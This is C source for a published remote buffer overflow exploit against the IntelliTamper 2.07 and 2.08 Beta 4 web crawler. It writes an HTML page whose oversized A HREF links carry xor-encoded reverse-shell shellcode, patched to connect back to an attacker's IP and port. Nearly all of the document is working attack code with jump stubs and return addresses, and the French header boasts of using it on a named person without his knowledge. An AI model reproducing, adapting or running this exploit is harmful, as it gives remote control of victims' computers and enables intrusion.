
# Title : IntelliTamper 2.07/2.08 Beta 4 A HREF Remote Buffer Overflow Exploit
# Published : 2008-08-13
# Author : kralor


/********************************************************************/
/* [Crpt]  IntelliTamper v2.07/2.08 Beta 4 sploit by kralor  [Crpt] */
/********************************************************************/
/*                             NO MORE                              */
/* CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL */
/* CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL */
/* CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL */
/* CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL */
/********************************************************************/
/* Exploit testé sur Jef_FR a son insu, ca marche bien a 100%  :)      */
/* Jef_FR pourra vous le confirmer hihi :P                          */
/* Au fait c'est universel pcq si la personne utilise la v2.08beta4 */
/* ben y'a du SEH alors le premier lien qui est fait plus petit     */
/* pour la v2.07 ca fera pas planter, ca sera pris en charge par le */
/* programme.. Bref que dire de plus... Si ce n'est qu'on peut p-e  */
/* jumper direct sans aller a un jmp ebx, en utilisant 0x00F1FFDC   */
/* j'ai remarqué que sur les deux versions une fois que ca crash     */
/* (je catch l'exception meme si le prog a du SEH!) ebx pointe vers */
/* cet offset toujours le meme (~fin de notre buffer). J'ai pas     */
/* regardé sur d'autres plateformes, vu que j'ai deja des ret        */
/* (jmp ebx) qui vont tres bien  :)  c'est tout les poulets, enjoy.   */
/*                                                                  */
/* P.S: Faut regarder que votre IP xoré par 0x98 donne pas un bad    */
/* opcode du genre < > " r n ... C'est pas sorcier a coder  :)      */
/********************************************************************/
/* informations: www.coromputer.net, irc undernet #coromputer       */
/********************************************************************/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#ifdef _WIN32
#include <winsock.h>
#pragma comment(lib, "ws2_32")
#else
#include <arpa/inet.h>
#endif

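/* Per-version layout of the crafted A HREF value: a 0x90 sled, the shellcode
 * at SCOFFSET*, the overwriting return address at RET_POS*, and two jump
 * stubs just below the return address (see main()).
 *
 * NOTE: this listing had lost its backslash escapes ("rn" where "\r\n" was,
 * "xd9" where "\xd9" was); they are restored here. */
#define SIZEOF   14448                 /* link length for v2.08 Beta 4. The
                                        * v2.07 link is shorter: the high byte
                                        * of RET_ADDR2 is 0x00, so the string
                                        * ends at RET_POS2+4 = 6836 when the
                                        * buffer is written as a C string. */

#define SCOFFSET 10000                 /* IntelliTamper v2.08 Beta 4 */
#define RET_POS  (SIZEOF-4)            /* parenthesised so it is safe inside
                                        * larger expressions */
#define RET_ADDR 0x004368C4            /* "jmp ebx" per the header note */

#define SCOFFSET2 100                  /* IntelliTamper v2.07 */
#define RET_POS2  6832
#define RET_ADDR2 0x00437224           /* "jmp ebx" per the header note */

#define u_short unsigned short
#define u_char  unsigned char
#define HOP 0xd9 /* host placeholder: four of these in the shellcode mark
                  * where set_sc() writes the xored IPv4 address */
#define POP 0xda /* port placeholder: four of these mark where set_sc()
                  * writes the xored AF_INET + port words */
#define BEGIN "<HTML><HEAD>hi</HEAD>\r\n<BODY>\r\n"
#define END   "</BODY>\r\n</HTML>"

/*
 * Patch the reverse-shell destination into the xor-encoded shellcode.
 *
 * The shellcode carries two 4-byte placeholders: HOP HOP HOP HOP where the
 * IPv4 address goes and POP POP POP POP where the sockaddr_in prefix goes
 * (AF_INET = 2 as a little-endian 16-bit word, then the port in network
 * order). Both are written xored with 0x98, because the decoder stub in
 * front of the shellcode (the "classic xorer") xors every byte with 0x98
 * before the payload runs.
 *
 * host: dotted-quad IPv4 address, parsed with inet_addr() (no DNS).
 * port: 1..65535; range-checked by the caller.
 * sc:   NUL-terminated shellcode string, patched in place. Only the first
 *       occurrence of each placeholder is replaced.
 *
 * Returns 0 on success, -1 (after printing a message) when the address is
 * invalid, when a placeholder is missing, or when one of the eight xored
 * bytes is a character that would break the HTML attribute the link is
 * embedded in: NUL (ends the C string), '"', '<', '>', '\r', '\n'. That is
 * the check the header's P.S. asked the user to do by hand.
 */
int set_sc(const char *host, unsigned long port, char *sc)
{
  static const unsigned char bad[] = { 0x00, '"', '<', '>', '\r', '\n' };
  const unsigned char hop[4] = { HOP, HOP, HOP, HOP };
  const unsigned char pop[4] = { POP, POP, POP, POP };
  unsigned char patch[8];              /* [0..3] xored IP, [4..7] xored family+port */
  struct in_addr addr;
  size_t i, j, len;
  int ip_done = 0, p_done = 0;

  addr.s_addr = inet_addr(host);
  if (addr.s_addr == INADDR_NONE) {
    printf("error: invalid ip address %s\n", host);
    return -1;
  }
  /* Take the address bytes straight from the struct (network order), so
   * no host-endianness assumption is made, unlike the original unsigned
   * long arithmetic which relied on a little-endian build host. */
  memcpy(patch, &addr, 4);
  patch[4] = 0x02;                     /* AF_INET, little-endian 16-bit */
  patch[5] = 0x00;
  patch[6] = (unsigned char)((port >> 8) & 0xff);   /* port, network order */
  patch[7] = (unsigned char)(port & 0xff);

  for (i = 0; i < sizeof patch; i++) {
    patch[i] ^= 0x98;
    for (j = 0; j < sizeof bad; j++) {
      if (patch[i] == bad[j]) {
        printf("error: xored ip/port contains bad byte 0x%02x "
               "(< > \" \\r \\n or NUL); pick another ip/port\n", patch[i]);
        return -1;
      }
    }
  }

  /* strlen() bounds the scan: the shellcode is xor-encoded precisely so it
   * contains no NUL, so the whole payload is visible here. */
  len = strlen(sc);
  for (i = 0; i + 4 <= len; i++) {
    if (!ip_done && memcmp(sc + i, hop, 4) == 0) {
      memcpy(sc + i, patch, 4);
      ip_done = 1;
      i += 3;
    } else if (!p_done && memcmp(sc + i, pop, 4) == 0) {
      memcpy(sc + i, patch + 4, 4);
      p_done = 1;
      i += 3;
    }
  }

  if (!ip_done || !p_done) {
    printf("error: unable to find ip/port sequence in shellc0de\n");
    return -1;
  }
  return 0;
}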

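/* Print the usage line and terminate. Only reached on a wrong argument
 * count, so exit non-zero (the original exit(0) made a usage error look
 * like success to a calling script) and write to stderr so the message is
 * not swallowed by a redirected stdout.
 *
 * prog: argv[0], shown in the usage line. Does not return. */
void syntax(char *prog)
{
  fprintf(stderr, "syntax: %s <file> <rshell_ip> <rshell_port>\n", prog);
  exit(EXIT_FAILURE);
}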

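/* Print the tool banner on stdout. The escape sequences ("\n\t", "\t\t")
 * were lost in this listing and are restored here. */
void banner(void)
{
  printf("\n\t[Crpt] IntelliTamper v2.07/2.08 Beta 4 sploit "
         "by kralor [Crpt]\n");
  printf("\t\t  www.coromputer.net && undernet #coromputer\n\n");
}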

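/* Store v as four little-endian bytes at dst.
 *
 * Replaces the original *(unsigned long *)&buffer[pos] = addr, which is an
 * unaligned, type-punned store and, on LP64 hosts where unsigned long is
 * 8 bytes, wrote 8 bytes: for RET_POS = SIZEOF-4 that ran 4 bytes past the
 * end of buffer. */
static void put_le32(char *dst, unsigned long v)
{
  unsigned char *p = (unsigned char *)dst;

  p[0] = (unsigned char)(v & 0xffUL);
  p[1] = (unsigned char)((v >> 8) & 0xffUL);
  p[2] = (unsigned char)((v >> 16) & 0xffUL);
  p[3] = (unsigned char)((v >> 24) & 0xffUL);
}

/* Fill buffer (SIZEOF bytes) with one version's crafted link: a 0x90 sled,
 * the shellcode at sc_off, the return address at ret_pos, and two backwards
 * jump stubs just below it: a 5-byte E9 rel32 jmp (far_jmp, displacement
 * differs per version) at ret_pos+4-16 and a 2-byte EB E0 short jmp at
 * ret_pos+4-8. By the displacements used here both land in the sled ahead
 * of the shellcode.
 *
 * The high byte of both return addresses is 0x00, so the address also
 * NUL-terminates the string at ret_pos+4; that is why the v2.07 link is
 * shorter than SIZEOF when written with fputs(). */
static void build_link(char *buffer, size_t ret_pos, unsigned long ret_addr,
                       size_t sc_off, const char *sc, size_t sc_len,
                       const char *far_jmp)
{
  size_t end = ret_pos + 4;            /* one past the return address */

  memset(buffer, 0x90, SIZEOF);
  put_le32(buffer + ret_pos, ret_addr);
  memcpy(buffer + sc_off, sc, sc_len);
  memcpy(buffer + end - 8, "\xEB\xE0", 2);   /* short jmp backwards */
  memcpy(buffer + end - 16, far_jmp, 5);     /* near jmp backwards, rel32 */
}

/* Emit one <A HREF="..."> line. The original did fprintf(file, buffer):
 * buffer is data, not a format string, so it is written with fputs().
 * Termination relies on the 0x00 high byte of the return address placed by
 * build_link(). */
static void write_link(FILE *file, const char *buffer, const char *label)
{
  fputs("<A HREF=\"", file);
  fputs(buffer, file);
  fputs("\">", file);
  fputs(label, file);
  fputs("</A><BR>\r\n", file);
}

/* Usage: <file> <rshell_ip> <rshell_port>
 *
 * Writes an HTML file holding two oversized A HREF links, one per
 * IntelliTamper version, each carrying the reverse-shell shellcode patched
 * with the given IP and port. Returns 0 on success, -1 on any error. */
int main(int argc, char *argv[])
{
  char buffer[SIZEOF];
  unsigned long port;
  long pval;
  char *endp;
  FILE *file;
  int ok;
  char shellc0de[] =   /* sizeof(shellc0de+xorer) == 334 bytes */
  /* classic xorer: decodes the payload in place by xoring each byte with 0x98 */
  /* "\xcc" (int3; presumably a debugging breakpoint, left out) */
  "\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x5b\x80\xc3\x10\x33\xc9\x66"
  "\xb9\x3f\x01\x80\x33\x98\x43\xe2\xfa"
  /* shellc0de (xor 0x98 encoded; HOP/POP placeholders patched by set_sc) */
  "\x19\x5c\x50\x98\x98\x98\x13\x74\x13\x6c\xcd\xce\xfc\x39\xa8\x98"
  "\x98\x98\x13\xd8\x94\x13\xe8\x84\x35\x13\xf0\x90\x73\x98\x13\x5d"
  "\xc6\xc5\x11\x9e\x67\xae\xf0\x16\xd6\x96\x74\x70\x35\x98\x98\x98"
  "\xf0\xab\xaa\x98\x98\xf0\xef\xeb\xaa\xc7\xcc\x67\x48\x13\x60\xcf"
  "\xf0\x41\x91\x6d\x35\x70\x0b\x98\x98\x98\xab\x51\xc9\xc9\xc9\xc9"
  "\xd9\xc9\xd9\xc9\x67\x48\x11\xde\xbc\xcf\xf0\x74\x61\x32\xf8\x70"
  "\xe1\x98\x98\x98\xf0\xd9\xd9\xd9\xd9\xf0\xda\xda\xda\xda\x13\x54"
  "\xf2\x88\xc9\x67\xee\xbc\x67\x48\xf0\xfb\xf5\xfc\x98\x11\xfe\xa8"
  "\x67\xae\xf0\xea\x66\x2b\x8e\x70\xc9\x98\x98\x98\x11\xde\x86\x1b"
  "\x74\xcc\x15\xa4\xbc\xab\x58\xab\x51\x1b\x59\x8d\x33\x7a\x65\x5e"
  "\xdc\xbc\x88\xdc\x66\xdc\xbc\xa5\x66\xdc\xbc\xa4\x13\xde\xbc\x11"
  "\xdc\xbc\xd0\x11\xdc\xbc\xd4\x11\xdc\xbc\xc8\x15\xdc\xbc\x88\xcc"
  "\xc8\xc9\xc9\xc9\xf2\x99\xc9\xc9\x67\xee\xa8\xc9\x67\xce\x86\x67"
  "\xae\xf0\x77\x56\x78\xf8\x70\x9a\x98\x98\x98\x67\x48\xcb\xcd\xce"
  "\xcf\x13\xf4\xbc\x80\x13\xdd\xa4\x13\xcc\x9d\xe0\x9b\x4d\x13\xd2"
  "\x80\x13\xc2\xb8\x9b\x45\x7b\xaa\xd1\x13\xac\x13\x9b\x6d\xab\x67"
  "\x64\xab\x58\x34\xa2\x5c\xec\x9f\x59\x57\x95\x9b\x60\x73\x6a\xa3"
  "\xe4\xbc\x8c\xed\x79\x13\xc2\xbc\x9b\x45\xfe\x13\x94\xd3\x13\xc2"
  "\x84\x9b\x45\x13\x9c\x13\x9b\x5d\x73\x9a\xab\x58\x13\x4d\xc7\xc6"
  "\xc5\xc3\x5a\x9c\x98";
  const size_t sc_len = sizeof(shellc0de) - 1;

  banner();

  if (argc != 4)
    syntax(argv[0]);

  /* strtol rather than atoi: empty input and trailing garbage are rejected,
   * and out-of-range values fail the bounds check below. */
  pval = strtol(argv[3], &endp, 10);
  if (endp == argv[3] || *endp != '\0' || pval < 1 || pval > 65535) {
    printf("error: <port> must be between 1 and 65535\r\n");
    return -1;
  }
  port = (unsigned long)pval;

  /* The shellcode must end before the far-jmp stub at RET_POS*+4-16 for both
   * layouts, otherwise build_link() would overwrite part of it. */
  if (SCOFFSET2 + sc_len > RET_POS2 + 4 - 16 ||
      SCOFFSET + sc_len > RET_POS + 4 - 16) {
    printf("error: shellcode too long for the link layout\r\n");
    return -1;
  }

  printf("[S] ip: %s port: %lu file: %s\r\n", argv[2], port, argv[1]);
  printf("[C] Setting universal %-39s ...", "shellcode");
  if (set_sc(argv[2], port, shellc0de))
    return -1;
  printf("DONE\r\n");

  /* Binary mode: on Windows text mode would turn the explicit "\r\n" into
   * "\r\r\n" and could mangle raw payload bytes. */
  file = fopen(argv[1], "wb");
  if (!file) {
    printf("error: unable to open %s\r\n", argv[1]);
    return -1;
  }
  fputs(BEGIN, file);
  fputs("sex drugs and rock'n'roll<BR>\r\n", file);

  printf("[C] Writing magic link for Intellitamper %-20s ...", "v2.07");
  build_link(buffer, RET_POS2, RET_ADDR2, SCOFFSET2, shellc0de, sc_len,
             "\xE9\x8F\xE5\xFF\xFF");
  write_link(file, buffer, "sexy bitch");
  printf("DONE\r\n");

  printf("[C] Writing magic link for Intellitamper %-20s ...", "v2.08 Beta 4");
  build_link(buffer, RET_POS, RET_ADDR, SCOFFSET, shellc0de, sc_len,
             "\xE9\x8F\xEB\xFF\xFF");
  write_link(file, buffer, "not sexy bitch");
  printf("DONE\r\n");

  fputs(END, file);
  /* A short write would otherwise go unnoticed: check the stream error flag
   * and the fclose() result, which flushes the last buffer. */
  ok = !ferror(file);
  if (fclose(file) != 0)
    ok = 0;
  if (!ok) {
    printf("error: writing %s failed\r\n", argv[1]);
    return -1;
  }
  printf("[C] All job done\r\n");
  return 0;
}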
